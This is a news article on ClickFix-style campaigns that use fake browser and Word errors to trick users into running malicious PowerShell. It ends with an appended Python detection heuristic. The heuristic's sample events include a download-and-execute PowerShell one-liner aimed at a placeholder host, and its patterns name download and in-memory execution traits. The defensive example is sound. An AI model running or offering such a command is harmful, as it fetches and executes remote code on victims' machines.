
If you see this error message in Chrome, be suspicious: you could infect your PC with malware

Cybercriminals are spreading a new campaign to infect PCs with malware

Pedro Domínguez


  • June 19, 2024
  • Updated: June 30, 2024 at 2:41 AM

A new malware distribution campaign is using fake errors in Google Chrome, Microsoft Word, and OneDrive. According to BleepingComputer, the purpose of these false alerts is to deceive users and make them run malicious PowerShell “fixes” in order to install malware on their computers. The campaign is being used by various cybercriminal groups, such as ClearFake, ClickFix, and TA571, the latter known for distributing large volumes of spam emails with malware and ransomware.


In previous attacks, ClearFake used website overlays to encourage users to install fake browser updates. In the new attacks, in addition to overlays, cybercriminals are using JavaScript in HTML attachments and compromised websites.

According to a report from cybersecurity company Proofpoint, these error messages deceive the user into copying a supposed PowerShell fix to the clipboard, and then pasting and executing it using the Run function or in a PowerShell console with administrator permissions. “Although the attack chain requires significant user interaction to succeed, the social engineering is clever enough to present someone with what appears to be a real problem and solution simultaneously, which can prompt a user to act without considering the risk,” the company warns.

Proofpoint has identified three attack chains that differ in their early stages; only one of these cannot be confidently attributed to TA571. In the first case, which is associated with ClearFake, users visit a compromised website that loads a malicious script hosted on the Binance blockchain. This script displays a fake Google Chrome warning and asks the visitor to install a “root certificate” by running a PowerShell script.

False error message in Microsoft Word – Proofpoint

The second attack chain, deriving from a ClickFix campaign, uses compromised web injections that create iframes to display fake Google Chrome errors, requesting users to execute PowerShell commands. The third attack chain uses emails with HTML attachments that appear to be Microsoft Word documents, asking users to install the “Word Online” extension to view the document correctly.

In all cases, PowerShell commands download and execute malicious files, resulting in infections such as Matanbuchus or DarkGate. With these new campaigns, cybercriminals take advantage of users’ lack of awareness about the risks of running PowerShell commands and the inability of Windows to detect these malicious actions.
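As an added example (not from the article, Proofpoint or BleepingComputer), this Python heuristic shows how a defender might flag the Run-dialog path described above: PowerShell started by explorer.exe with download-and-execute traits on its command line. The record layout, the sample events and the indicator list are constructed assumptions, not indicators taken from the reported campaigns.

```python
import re

# Generic PowerShell download/execute traits chosen for this example
# (an assumption), not IoCs from the campaigns in the article.
INDICATORS = {
    "download": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b"),
    "in-memory execution": re.compile(r"\b(iex|invoke-expression)\b"),
    "encoded command": re.compile(r"\s-e(c|nc|ncodedcommand)?\s"),
    "hidden window": re.compile(r"\s-w(in|indowstyle)?\s+hidden\b"),
}

# Constructed sample records shaped like process-creation telemetry
# (parent image, command line). Hosts and paths are placeholders.
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",   # pasted into the Run dialog
     "cmd": 'powershell -w hidden -c "iex (iwr https://fix.example.invalid/a.txt -UseBasicParsing)"'},
    {"parent": r"C:\Windows\explorer.exe",   # user simply opening a console
     "cmd": "powershell.exe"},
    {"parent": r"C:\Program Files\Mgmt\agent.exe",   # scheduled admin script
     "cmd": r"powershell -File C:\Scripts\inventory.ps1"},
    {"parent": r"C:\Windows\explorer.exe",   # Run dialog chaining through cmd
     "cmd": "cmd /c powershell -NoP -enc <base64 placeholder>"},
]


def indicators(event):
    """Return matched indicator names, or [] if the event is not a candidate."""
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    cmd = " " + event["cmd"].lower() + " "
    # Only consider PowerShell launched interactively from the user's shell.
    if parent != "explorer.exe" or ("powershell" not in cmd and "pwsh" not in cmd):
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def flag(events):
    """Return (index, indicators) for every event with at least one match."""
    return [(i, hits) for i, e in enumerate(events) if (hits := indicators(e))]


if __name__ == "__main__":
    for i, hits in flag(EVENTS):
        print(f"event {i}: {', '.join(hits)} -> {EVENTS[i]['cmd']}")
```

A command pasted into an already open PowerShell console does not appear on any process command line, so covering that path requires PowerShell script block logging rather than process-creation events.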

Pedro Domínguez


Publicist and audiovisual producer in love with social networks. I spend more time thinking about which videogames I will play than playing them.
